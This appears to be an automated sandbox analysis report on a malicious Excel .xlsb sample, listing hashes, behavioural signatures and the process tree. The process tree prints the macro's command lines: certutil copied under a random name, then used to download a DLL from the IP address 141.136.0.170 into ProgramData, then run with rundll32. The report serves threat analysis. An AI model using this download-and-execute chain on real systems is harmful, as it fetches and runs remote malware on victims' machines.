Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-02-2024 06:13
Behavioral task
behavioral1
Sample
ade047b047a762846f7df54eed3dd90a.xlsb
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ade047b047a762846f7df54eed3dd90a.xlsb
Resource
win10v2004-20240226-en
General
-
Target
ade047b047a762846f7df54eed3dd90a.xlsb
-
Size
157KB
-
MD5
ade047b047a762846f7df54eed3dd90a
-
SHA1
d14e19640dbed65b96ce6a3881261f5fb9335874
-
SHA256
42ee070ac0de1e32e2f436764560c31655f0e81aeb2f842a895cca3405fb2c7f
-
SHA512
6fde7aface8e173641a4a8519a7f3095b01417a470508ab5506f3843b93656b1cd7449e31c537e159ae863c9baea4a7a6de6b9c8a710cee35c289d5b42e3b0fc
-
SSDEEP
3072:TALCFzv4iOuXHPoDIniT5gg8JiaFpSA+gyLe:TLzFrHA8ez8rSA+ry
Malware Config
Extracted
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2892 2852 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2268 2852 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3828 2852 cmd.exe EXCEL.EXE -
Executes dropped EXE 1 IoCs
Processes:
vWJpojwO.exepid process 3548 vWJpojwO.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2852 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2852 EXCEL.EXE 2852 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE 2852 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
EXCEL.EXEcmd.execmd.exedescription pid process target process PID 2852 wrote to memory of 2892 2852 EXCEL.EXE cmd.exe PID 2852 wrote to memory of 2892 2852 EXCEL.EXE cmd.exe PID 2852 wrote to memory of 2268 2852 EXCEL.EXE cmd.exe PID 2852 wrote to memory of 2268 2852 EXCEL.EXE cmd.exe PID 2268 wrote to memory of 3548 2268 cmd.exe vWJpojwO.exe PID 2268 wrote to memory of 3548 2268 cmd.exe vWJpojwO.exe PID 2852 wrote to memory of 3828 2852 EXCEL.EXE cmd.exe PID 2852 wrote to memory of 3828 2852 EXCEL.EXE cmd.exe PID 3828 wrote to memory of 4200 3828 cmd.exe rundll32.exe PID 3828 wrote to memory of 4200 3828 cmd.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ade047b047a762846f7df54eed3dd90a.xlsb"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mkdir %programdata%\vWJpojwO && copy /b %SystemRoot%\System32\c*tutil.exe c:\programdata\vWJpojwO\vWJpojwO.exe2⤵
- Process spawned unexpected child process
PID:2892 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c c:\programdata\vWJpojwO\vWJpojwO.exe -urlcache -f -split http://141.136.0.170 c:\programdata\vWJpojwO\vWJpojwO.dll2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2268 -
\??\c:\programdata\vWJpojwO\vWJpojwO.exec:\programdata\vWJpojwO\vWJpojwO.exe -urlcache -f -split http://141.136.0.170 c:\programdata\vWJpojwO\vWJpojwO.dll3⤵
- Executes dropped EXE
PID:3548 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\vWJpojwO\vWJpojwO.dll,GlobalOut2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Windows\system32\rundll32.exerundll32 C:\ProgramData\vWJpojwO\vWJpojwO.dll,GlobalOut3⤵PID:4200
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b